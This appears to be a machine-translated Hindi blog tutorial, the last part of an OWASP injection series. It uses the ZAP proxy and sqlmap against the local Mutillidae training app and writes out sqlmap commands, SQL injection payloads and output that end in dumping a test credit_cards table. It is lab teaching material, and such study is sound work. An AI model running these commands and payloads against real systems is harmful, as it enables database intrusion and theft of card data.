👩🏽‍🌾 👨🏼‍🎤 👅 A1: 2017 - इंजेक्शन (भाग 3 और अंतिम) 👩🏿‍⚖️ 💃🏿 😠

मेरे पसंदीदा कंप्यूटर गेम क्वेस्ट फॉर ग्लोरी 2 में: ट्रायल बाय फायर, जब दुनिया एक बार फिर खतरे में है, तो मुख्य चरित्र विजार्ड्स विश्वविद्यालय में समाप्त होता है। प्रवेश परीक्षाओं को सफलतापूर्वक पास करने के बाद, दाढ़ी वाले बुद्धिमान जादूगर इस विश्वविद्यालय में जाने की पेशकश करते हैं, क्योंकि इसे समाप्त करने के बाद, हम जादू की सभी जटिलताओं को समझेंगे, सभी मंत्रों का अध्ययन करेंगे और फिर हम निश्चित रूप से अपने दोस्तों को बचाएंगे और दुनिया की बुराई को हराएंगे। एकमात्र समस्या यह है कि उन्हें 15-20 वर्षों तक अध्ययन करना होगा, और इस समय के दौरान बुरी शक्तियों को एक से अधिक बार पराजित करने का समय होगा।

हर बार जब मैं अनपेक्षित रूप से इस प्रकरण को याद करता हूं, जब मुझे एक और दिलचस्प किताब या तकनीकी दस्तावेज का ढेर लगता है। समय प्रबंधन के बारे में बहुत सारी किताबें लिखी गई हैं, लेकिन मेरे लिए यह एक साधारण सूत्र के लिए आता है: मूल बातें पता लगाना, उदाहरणों का पता लगाना - फिर केवल स्वचालन!

अब जब हमें कुछ पता है कि इंजेक्शन कैसे काम करते हैं, तो हमारे जीवन को सरल बनाने की कोशिश क्यों न करें और एक बार फिर कुछ अतीत का उदाहरण दें, लेकिन अतिरिक्त सॉफ़्टवेयर की मदद से। हमें दो उपकरण चाहिए:
Sqlmap - एक उपकरण जो आपको SQL और ZAP प्रॉक्सी में कमजोरियों की खोज और शोषण को स्वचालित करने की अनुमति देता है - एक स्थानीय प्रॉक्सी सर्वर जो वेब सर्वर में ब्राउज़र के बीच यातायात का विश्लेषण करने के लिए आवश्यक है।

फिर, यह ध्यान देने योग्य है कि ये एकमात्र ऐसे उपकरण नहीं हैं, और अगले ब्लॉग में यह सुनिश्चित करने के लिए कि आप यह साबित कर देंगे कि sqlmap के बजाय आपको sqlninja से निपटने की आवश्यकता है, और बर्प होने पर आपको ZAP के साथ समय बिताने की आवश्यकता नहीं है। मैंने किसी के साथ बहस नहीं की।

हम क्लाइंट और वेब सर्वर के बीच यातायात को रोककर जीवन को आसान बनाना शुरू करेंगे। परिणामी डेटा को sqlmap के मापदंडों के रूप में उपयोग किया जाएगा। द्वारा और बड़े, कमजोर एप्लिकेशन का URL भी इस तरह के एक पैरामीटर के रूप में काम कर सकता है, लेकिन अब प्रॉक्सी से डेटा हमारे लिए स्पष्ट होगा।

हम A1 से उसी उदाहरण के साथ काम करेंगे, जिसका हमने पिछले लेख ("SQLi - एक्सट्रेक्ट डेटा"> "उपयोगकर्ता जानकारी (SQL)") में विश्लेषण किया था।

हम अपने ZAP प्रॉक्सी के माध्यम से इस पृष्ठ पर जाएंगे और कुछ डेटा दर्ज करेंगे। मैं समझता हूं कि प्रलोभन पहले से ही हमने जो कुछ भी सीखा है, उससे कुछ करने की कोशिश करने के लिए है, लेकिन अभी आपको केवल स्पष्ट रूप से गलत डेटा दर्ज करने की आवश्यकता है। मैं अपना पसंदीदा व्यवस्थापक / पासवर्ड दर्ज करता हूं और इंटरसेप्शन में निम्नलिखित अनुरोध प्राप्त करता हूं:

GET http://127.0.0.1/mutillidae/index.php?page=user- info.php&username=admin&password=password&user-info-php-submit- button=View+Account+Details HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: http://127.0.0.1/mutillidae/index.php?page=user-info.php Cookie: showhints=1; PHPSESSID=aqvrdm615sm8k7isopefgbhega Connection: keep-alive Upgrade-Insecure-Requests: 1 Host: 127.0.0.1

यहाँ हम मुख्य रूप से पहली पंक्ति में रुचि रखते हैं, अर्थात् अनुरोध। कभी-कभी यह जाँचना उपयोगी होता है कि क्या हमने अवरोधन किया है। यह एक ही ब्राउज़र में इस उत्पन्न अनुरोध को दोहराकर किया जा सकता है। यदि हमें त्रुटि के साथ वही पृष्ठ मिलता है, तो हम सही रास्ते पर हैं।

हम एक अलग फ़ाइल request_sqlmap.txt के रूप में हमारे अवरोधन अनुरोध को सहेजेंगे।

अब, इस फ़ाइल को sqlmap के विश्लेषण के लिए पास करते हैं:

 sqlmap -r reqest_sqlmap.txt --banner

हमें यह निर्धारित करने की कोशिश करने के लिए कि हम किस DBMS के साथ काम कर रहे हैं, यह निर्धारित करने के लिए sqlmap के लिए -banner पैरामीटर की आवश्यकता है। हमारे उदाहरण में, यह इतना महत्वपूर्ण नहीं है, लेकिन व्यवहार में, आप अन्य DBMS के पहलुओं से विचलित हुए बिना परीक्षण को गति दे सकते हैं जो आपके लक्ष्य पर लागू नहीं होते हैं।

 [23:19:48] [INFO] GET parameter 'username' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable GET parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n sqlmap identified the following injection point(s) with a total of 181 HTTP(s) requests: --- Parameter: username (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: page=user-info.php&username=admin' AND (SELECT 5399 FROM(SELECT COUNT(*),CONCAT(0x7171707871,(SELECT (ELT(5399=5399,1))),0x71706a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'UUZA'='UUZA&password=password&user-info-php-submit-button=View Account Details Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: page=user-info.php&username=admin' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171707871,0x4d754c5372467a65665a4c7672636e4c4a554777547162474e666f784e6b69754a43544a41675a50,0x71706a6271),NULL,NULL,NULL-- GGvT&password=password&user-info-php-submit-button=View Account Details --- [23:20:10] [INFO] the back-end DBMS is MySQL [23:20:10] [INFO] fetching banner web server operating system: Windows web application technology: Apache 2.4.29, PHP 7.2.3 back-end DBMS: MySQL >= 5.0 banner: '10.1.31-MariaDB' [23:20:10] [INFO] fetched data logged to text files under '/home/belowzero273/.sqlmap/output/127.0.0.1'

स्कैन सफलतापूर्वक पूरा हो गया था, और हमने एक बार फिर से देखा कि सामान्य तौर पर, हम पहले से ही जानते थे:

 [23:19:48] [INFO] GET parameter 'username' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable

इसके अलावा, sqlmap ने निर्धारित किया कि हम mysql, या बल्कि, इसके कांटे के साथ काम कर रहे हैं। अब देखते हैं कि सर्वर पर कौन से डेटाबेस हैं:

 sqlmap -r reqest_sqlmap.txt -p username --dbms=MySQL --dbs

इसके बाद, हम अपनी इंटरसेप्शन फ़ाइल को sqlmap के पैरामीटर के रूप में इंगित करेंगे। इसके अलावा, हम उन मापदंडों को इंगित करेंगे जो हम पहले से जानते हैं: DBMS का प्रकार, साथ ही मौजूदा डेटाबेस के बारे में डेटा प्राप्त करने के लिए -dbs स्विच:

 [23:27:19] [WARNING] reflective value(s) found and filtering out available databases [6]: [*] information_schema [*] mutillidae [*] mysql [*] performance_schema [*] phpmyadmin [*] test

बहुत बढ़िया। आमतौर पर, डेटाबेस को कुछ सार्थक नाम दिए जाते हैं, या एप्लिकेशन इंस्टॉल करते समय वे स्वचालित रूप से बनाए जाते हैं। "अस्पष्टता से सुरक्षा" का सिद्धांत, निश्चित रूप से रद्द नहीं किया गया है, लेकिन यह नियम के बजाय अपवाद है। हमारे मामले में सबसे दिलचस्प बात, जाहिरा तौर पर, आधार उत्परिवर्ती है, आइए देखें कि इसमें क्या शामिल हैं:

 sqlmap -r reqest_sqlmap.txt -p username --dbms=MySQL -D mutillidae --tables

यहाँ, हम जानते हैं कि चीजों के लिए, हम इस डेटाबेस में तालिकाओं को देखने के लिए आवश्यक DBMS और –tables कुंजी जोड़ेंगे:

 [23:29:42] [WARNING] reflective value(s) found and filtering out Database: mutillidae [13 tables] +----------------------------+ | accounts | | balloon_tips | | blogs_table | | captured_data | | credit_cards | | help_texts | | hitlog | | level_1_help_include_files | | page_help | | page_hints | | pen_test_tools | | user_poll_results | | youtubevideos | +----------------------------+

पहले से ही बुरा नहीं है। क्रेडिट_कार्ड तालिका विशेष रूप से आशाजनक दिखती है। आइए इसे देखें:

 sqlmap -r reqest_sqlmap.txt -p username --dbms=MySQL -D mutillidae -T credita_cards --columns

और:

 [23:31:35] [WARNING] reflective value(s) found and filtering out Database: mutillidae Table: credit_cards [4 columns] +------------+---------+ | Column | Type | +------------+---------+ | ccid | int(11) | | ccnumber | text | | ccv | text | | expiration | date | +------------+---------+

वाह, वहाँ एक पूरी तालिका है जहाँ क्रेडिट कार्ड डेटा संग्रहीत किया जाना चाहिए! अब जब हम आ गए हैं, तो आइए इस तालिका को देखें:

 sqlmap -r reqest_sqlmap.txt -p username --dbms=MySQL -D mutillidae -T credit_cards --dump

उफ़:

 [23:32:42] [WARNING] reflective value(s) found and filtering out Database: mutillidae Table: credit_cards [5 entries] +------+-----+----------------------------+-----------------+ | ccid | ccv | ccnumber | expiration | +------+-----+----------------------------+-----------------+ | 1 | 745 | 4444111122223333 | 2012-03-01 | | 2 | 722 | 7746536337776330 | 2015-04-01 | | 3 | 461 | 8242325748474749 | 2016-03-01 | | 4 | 230 | 7725653200487633 | 2017-06-01 | | 5 | 627 | 1234567812345678 | 2018-11-01 | +------+-----+----------------------------+-----------------+

यहाँ वे हैं, हमारे क्रेडिट कार्ड। अब आपके दिमाग में दो सवाल आने चाहिए: यह कैसे काम करता है, और यह सारा डेटा कहां से आता है?

यह कैसे काम करता है? ठीक है, कड़ाई से बोलते हुए, यह वही है जैसे कि आप सभी संभावित विकल्पों के माध्यम से छंटनी कर रहे थे, इस या उस भेद्यता का फायदा उठाने के लिए यादृच्छिक रूप से कोशिश कर रहे थे।

लेकिन डेटा कहां से आया, यह सवाल उस प्रशासक के लिए है जिसने इस तरह के अनुचित स्थान पर ऐसी महत्वपूर्ण जानकारी पोस्ट की है।

Sqlmap में दर्जनों पैरामीटर हैं जिन्हें हम एक लेख में पार्स नहीं कर सकते हैं। लेकिन मेरे लेखों का कार्य समाधान पेश करना है, और फिर यह आप पर निर्भर है। बाकी आधारों को खोदने और मापदंडों के साथ प्रयोग करने के लिए अपने अवकाश पर प्रयास करें, शायद क्रेडिट कार्ड सबसे दिलचस्प नहीं हैं। =)

इस लिंक पर लेखक का ब्लॉग पढ़ें।

A1: 2017 - इंजेक्शन (भाग 3 और अंतिम)

More articles: